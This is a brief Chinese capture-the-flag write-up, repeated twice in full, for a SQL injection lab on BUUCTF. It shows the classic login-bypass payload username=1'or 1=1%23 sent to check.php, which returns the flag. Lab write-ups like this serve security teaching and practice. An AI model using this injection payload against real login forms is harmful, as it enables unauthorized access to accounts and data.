进入靶场:
http://bf595771-c293-46f1-a5ca-3471fa3827f5.node4.buuoj.cn:81
看一下源码,找到注入点。
然后尝试万能密码,给username和password传参。
check.php?username=1'or 1=1%23&password=1
成功得到flag
进入靶场:
http://bf595771-c293-46f1-a5ca-3471fa3827f5.node4.buuoj.cn:81
看一下源码,找到注入点。
然后尝试万能密码,给username和password传参。
check.php?username=1'or 1=1%23&password=1
成功得到flag